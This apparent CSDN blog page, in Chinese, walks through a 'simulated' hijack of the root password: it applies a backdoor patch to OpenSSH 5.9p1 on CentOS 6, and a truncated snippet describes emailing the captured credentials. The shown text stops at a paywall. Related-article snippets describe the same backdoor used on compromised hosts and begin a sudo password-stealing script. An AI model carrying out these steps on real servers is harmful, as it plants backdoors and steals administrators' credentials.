Root密码自动发送到邮箱

最新推荐文章于 2022-04-15 15:54:42 发布
最新推荐文章于 2022-04-15 15:54:42 发布
阅读量693 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zsw07/article/details/104316222
版权
本文介绍了如何模拟在Centos 6环境下劫持Root密码并自动发送到指定邮箱的过程。通过打补丁、安装带有后门的sshd服务,并利用inotify-tools监测文件变化来实现自动发邮件的功能,详细阐述了每个步骤的操作方法。
摘要由CSDN通过智能技术生成

记一次服务器被当作肉鸡,服务器再一次被黑后,没有发生任何意外,管理员也就没当回事,没有太在意,也紧急修改了密码,但是过段时间后,服务器经常性的CPU飙高,总是会有一些莫名进程占用内存,杀掉进程,修改登录密码,发现过段时间后,还会出现这种情况,这是因为sshd已被修改,有后门,无论你怎样修改密码,黑客都会收到你的用户名和密码。今天,我们模拟劫持root密码并自动发送到指定邮箱
在这里插入图片描述
准备环境:Centos 6

需要用到的资源(可下载):

0x06-openssh-5.9p1.patch.tar.gz
-link
openssh-5.9p1.tar.gz
-link
inotify-tools-3.13.zip
-link

模拟劫持 Root 密码

记录正常的 ssh 版本

[root@Fp-01 ~]# ssh -v
OpenSSH_5.3p1, OpenSSL 1.0.1e-fips 11 Feb 2013

上传所需的资源到服务器

[root@Fp-01 tmp]# ll
total 1492
-rw-r--r--. 1 root root    3700 Feb 14 10:31 0x06-openssh-5.9p1.patch.tar.gz
-rw-r--r--. 1 root root  412946 Feb 14 10:31 inotify-tools-3.13.zip
-rw-r--r--. 1 root root 1110014 Feb 14 10:31 openssh-5.9p1.tar.gz

先解压 0x06-openssh、openssh,为接下来的打补丁做准备

[root@Fp-01 tmp]# tar -zxf 0x06-openssh-5.9p1.patch.tar.gz
[root@Fp-01 tmp]# tar -zxvf 0x06-openssh-5.9p1.patch.tar.gz 
openssh-5.9p1.patch/
openssh-5.9p1.patch/LICENSE
openssh-5.9p1.patch/INSTALL
openssh-5.9p1.patch/README
openssh-5.9p1.patch/sshbd5.9p1.diff
openssh-5.9p1.patch/ssh_integrity_checker.sh

开始打补丁

先将补丁文件放入 openssl 目录下

[root@Fp-01 tmp]# cp openssh-5.9p1.patch/sshbd5.9p1.diff openssh-5.9p1
[root@Fp-01 tmp]# cd openssh-5.9p1

打补丁:替代原来的文件

[root@Fp-01 openssh-5.9p1]# patch < sshbd5.9p1.diff 
patching file auth.c	# 认证
patching file auth-pam.c	# 认证
patching file auth-passwd.c	# 认证
patching file canohost.c
patching file includes.h	# 密码宝典
patching file log.c
patching file servconf.c	# sshd 服务端
patching file sshconnect2.c	#
最低0.47元/天 解锁文章
Dragon-wei
关注
自动劫持root密码
qq_40907977的博客
11-29 380
内容 : 1、暴力破解sshd服务密码 2、自动劫持root密码并转发密码邮箱 实战: 自动劫持root密码并转发到邮箱 一、自动劫持root密码 二、把存密码的文件转发到邮箱 root密码 :123456 root密码 : 123456 可以登陆 一个用户名对应一个密码。多出来的密码就是后门密码。 为什么要做 :自动劫持root密码并转发到邮箱 作用 :当你的肉鸡密码被修改后,你可以收到管理员修改的密码。 劫持root密码的过程 安装 解压文件 1、ssh -v 63# ssh -v #查看安装
linux用户自动输入密码,Linux自动输入密码登录用户
weixin_39540744的博客
04-29 1915
每次进去Linux系统,都有切换root用户,输入密码很麻烦,所以就写了一个小脚本,自动输入密码,登录到root用户,1,首先检查一些是否安装了expectroot@wuzs:/home/wuzs# whereis expect expect: /usr/bin/expect /usr/shar...
实战-自动劫持root密码并转发密码邮箱
晨!!!的博客
02-14 1565
实验环境:RHEL 6,在Centos7下无法实现 劫持root密码的过程 实验拓扑图: 思路:在zmedu63上安装一个打了后门补丁的sshd服务,当用户来连接时,直接把密码记录下来。然后使用脚本发给我们的邮箱中 1、查看ssh版本 ssh -v #查看安装前ssh版本 OpenSSH_5.3p1, OpenSSL 1.0.0-fips 29 Mar 2010 2、确认gcc是否已安...
自动劫持root密码并转发密码邮箱
weixin_34234829的博客
11-05 309
自动劫持root密码并转发密码邮箱 一:实验内容自动劫持root密码并转发密码邮箱 二:劫持root密码的过程: 过程1:如上图所示。***登录到sshd服务系统之后会用***补丁文件将原来的sshd服务替换掉,并且留下后门密码,此后门密码还可以直接登录系统。  过程2:网络管理员登录到系统之后,所登录的路径已经不是原来真实安全的路径了,是由***替换掉的sshd服务和路径。在此登录之后,管理...
linux 将新密码邮件发送,linux脚本实现自动发送和收取邮件的设置方法
weixin_34668850的博客
04-29 329
linux脚本实现自动发送和收取邮件的设置方法更新时间:2013年05月11日 19:51:45 作者:这篇文章主要是介绍linux下通过脚本自动发送和收取邮件的设置方法,有需要的朋友可以参考下1. 命令行模式下的发送邮件1.1 安装sendemail2.2 使用sendemail和举例2. 命令行模式下的收取邮件2.1 安装getmail42.2 配置getmail4和简单举例2.3 用mu...
模拟黑客劫持Root密码自动发送邮箱
02-14 1475
记一次服务器被当作肉鸡,服务器再一次被黑后,没有发生任何意外,管理员也就没当回事,没有太在意,也紧急修改了密码,但是过段时间后,服务器经常性的CPU飙高,总是会有一些莫名进程占用内存,杀掉进程,修改登录密码,发现过段时间后,还会出现这种情况,这是因为sshd已被修改,有后门,无论你怎样修改密码,黑客都会收到你的用户名和密码。今天,我们模拟劫持root密码自动发送到指定邮箱 准备环境:Cento...
自动发送邮件 -- 密码找回功能的实现message
DavidChow 探索之旅
04-14 638
                SmtpClient client = new SmtpClient();                MailMessage message = new MailMessage();                client.Credentials = new NetworkCredential(@areaName, @password);        
窃取linux root密码,[后门艺术]sudo下窃取root密码 | 独木の白帆
weixin_39565021的博客
05-09 294
前几天在GitHub上看到一大牛的sudo下窃取root用户密码的shell脚本,测试了下还非常管用。真可谓是居家旅行,杀人放火的必备工具啊,所以不敢私藏,在此分享给所有渗透狗~_~废话就不说了,直接上脚本:Shell#!/bin/bash/usr/bin/sudo -ki=0while [ $i != 3 ]; doecho -n "[siii] password for $(whoami): ...
linux 自动分析邮件,Ubuntu Linux自动发邮件配置及邮件发送脚本
weixin_39805409的博客
05-07 131
测试环境:Ubuntu 11.101. 安装mutt及msmtp软件sudo apt-get install muttsudo apt-get install msmtp2. 编辑配置文件vi ~/.muttrcset sendmail="/usr/bin/msmtp"set use_from=yesset realname="Guobao Jiang"set from=loveaborn@163...
centos7下密码定期自动更改并用mail发邮件
热门推荐
yaodunlin的博客
03-13 1万+
一、利用centos自带发邮件工具实现 1,安装sendmail yum -y install sendmail systemctl start sendmail 2,安装mailx yum install -y mailx 3,配置文件 vim /etc/mail.rc 结尾追加 set bsdcompat set from=邮箱账号@163.com set sm...
linux root邮箱地址,linux – 如何将root的电子邮件转发到外部电子邮件地址?
weixin_32613887的博客
05-12 804
我家里有一台小型服务器(Ubuntu 10.04),我想将root的电子邮件转发到我的gmail托管域,以获取安全通知,什么不是.我把所有东西都撕掉了,然后从头开始跑到other issues.我现在有sendmail工作,我可以发邮件到some@external.com并收到邮件.但是,向/root/.forward添加地址实际上并不转发该消息.我在日志中得到以下内容:Dec 22 14:04:...
linux 定时传送文件 scp脚本实现自动密码并传送
weixin_42184538的博客
04-15 5583
实现在每天2点将服务器上的数据库文件通过scp发送到另一台服务器,同时自动输入密码
shell中发送邮件方法小结
@_囚徒-2018_的家园
09-04 1万+
1.mail mail是unix-like中发送和接收邮件的程序。linux的每一个账户都有一个信箱/var/spool/mail/wahaha(未读邮件),还有一个收件箱~/mbox(已读邮件会放到这里) 格式: mail mail[option] [-s subject] [-c cc-addr] to-addr 重要选项: -s 指定邮件主题 -c 指定抄送的人 -a 指定
linux 自动输入密码脚本,[转]Linux中shell脚本如何自动输入密码
weixin_33168127的博客
04-29 1244
shell脚本在处理自动循环或大的任务方面可节省大量的时间,通过创建一个处理任务的命令清单,使用变量、条件、算术和循环等方法快速创建脚本以完成相应工作,这比在命令行下一个个敲入命令要省时省力得多。但是有时候我们可能会需要实现和交互程序如ftp,telnet服务器等进行交互的功能,这时候我们需要用到shell的自动交互功能.最简单的例子就是创建用户,我创建100个用户,初始密码为123,那么要是挨着...
自动劫持 root 密码并转发到邮箱
Permission_777的博客
02-14 621
软件包 0x06-openssh-5.9p1.patch.tar.gz openssh-5.9p1.tar.gz inotify-tools-3.13.tar.gz 1、安装 gcc [root@ localhost ~]# yum -y install epel-release [root@ localhost ~]# yum -y install gcc 2、安装 0x06-openss...
Android App 可以定时启动! 并且完成短信自动发送获取内容功能 (以获取闪讯密码为例 大学宿舍宽带)
YHJ
06-14 3085
接上一篇:android 发送短信sendTextMessage()真机运行报错,退出,在已申请SEND_SMS权限的情况下Android send SMS not working uid 。。。 重开一篇,完整讲述我这个半吊子的android 入门人员是怎么做出一个可以定时启动并且发送短信,读取回信里面的密码 这个功能的app 至于我为什么要做这个功能,可以看上一篇文章。主要是大学里面宽带密码定期更新手动去获取太麻烦~~ 得先放出运行效果视屏才行,如下:只是点击了发送按钮,就会做到自动发送、接收、提取
树莓派自动发送照片代码
最新发布
03-22
以下是一个使用 Python 和树莓派摄像头自动拍照并发送照片到指定邮箱的代码: ```python import os import smtplib import time from email.mime.image import MIMEImage from email.mime.multipart import MIMEMultipart # 设置邮箱账号和密码 EMAIL_USER = 'your_email@example.com' EMAIL_PASSWORD = 'your_email_password' # 设置收件人邮箱 RECIPIENT_EMAIL = 'recipient_email@example.com' # 设置拍照间隔时间(秒) PHOTO_INTERVAL = 60 # 初始化摄像头 os.system('sudo modprobe bcm2835-v4l2') # 创建邮件对象 msg_root = MIMEMultipart() msg_root['Subject'] = '树莓派照片' msg_root['From'] = EMAIL_USER msg_root['To'] = RECIPIENT_EMAIL # 开始循环拍照并发送 while True: # 拍照 os.system('raspistill -o photo.jpg') # 读取照片并添加到邮件中 with open('photo.jpg', 'rb') as f: img = MIMEImage(f.read()) msg_root.attach(img) # 发送邮件 smtp = smtplib.SMTP('smtp.gmail.com', 587) smtp.starttls() smtp.login(EMAIL_USER, EMAIL_PASSWORD) smtp.sendmail(EMAIL_USER, RECIPIENT_EMAIL, msg_root.as_string()) smtp.quit() # 等待一段时间后再拍照 time.sleep(PHOTO_INTERVAL) ``` 这个代码会每隔一定时间拍摄一张照片,并将照片发送到指定邮箱。你需要将代码中的 EMAIL_USER、EMAIL_PASSWORD 和 RECIPIENT_EMAIL 替换为你自己的邮箱账号和密码以及收件人邮箱
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值